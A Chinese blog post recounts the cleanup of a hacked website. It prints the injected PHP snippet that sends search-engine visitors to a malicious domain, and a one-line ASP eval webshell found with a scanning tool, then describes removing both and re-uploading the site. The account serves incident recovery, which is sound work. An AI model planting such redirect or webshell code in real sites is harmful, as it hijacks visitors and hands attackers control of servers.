青岛峰会期间本来想给自己放几天假的,因为网站的挂马给泡汤了,打开网站首页,使用浏览器的源代码功能,发现自己网站的首页多了很多木马代码,于是我连接FTP查看网站首页的代码中发现了这个挂马代码,下面我把代码贴出来 :
<?phperror_reporting(0);if(eregi('google|soso|sogou|baidu',$_SERVER['HTTP_REFERER']) ){ echo '<>window.location.href="http://www."+"tao"+"8s"+".in"+"fo";</>';}
恶意的挂马网址 www.tao8s.info
解释一下:这个代码是 PHP的代码是一种条件性的挂马,上面的google soso sogou baidu 都是挂马的条件,意思就是当从 google soso...等等搜索引擎来的访问客户会自动在网页上隐藏一行代码也就是挂马代码。
访问这个网站的用户,一般都会被360和百度提示网站有风险和网站挂马提示的,但是这个挂马为什么不提示呢? 这里我给大家解密下,不要以为病毒都会被杀毒软件杀掉,杀毒软件也不是万能的,就像警察抓小偷,警察不知道小偷的特征怎么去抓捕呢? 杀毒和这个道理一样的是根据特征来的,有一些病毒出来的早,没有被杀毒跟踪到,所以360和百度也不会有什么安全挂马提示(一般业界人士称“免杀病毒”。
说的有点多,言归正传。说点干货,那遇到这种情况咋办啊,我的解决办法就是先查清楚病因后除根,于是用FTP把网站程序全部打包下来然后一个一个文件的检查,看看有没有其他名字的文件,我在网上查到一般木马文件名字都是global.asa global.asp 啥的,反正是些不熟悉的文件名,检查了一下没有发现特殊的文件名字,于是开始检查代码方面,都知道程序员写代码能累死,于是在百度上查到了一个叫sinesafe的网站挂马代码检查工具,这个工具是专门检查挂马代码的和木马代码的。我把网站程序的代码文件放到工具检测了一下,发现了木马代码 <%eval request("hack")%> eval的特征代码,找到这个代码后我就给删除了,重复的用挂马检测工具检查了好几遍,没有发现问题后,我这才放心。连接到FTP,把网站程序重新上传了一遍,网站这才稳定下来。
折腾了我一天,连午睡都没捞着睡,困死我了。以上就是我网站被挂马后的解决经历,有什么不懂的也随时欢迎大家与我交流探讨。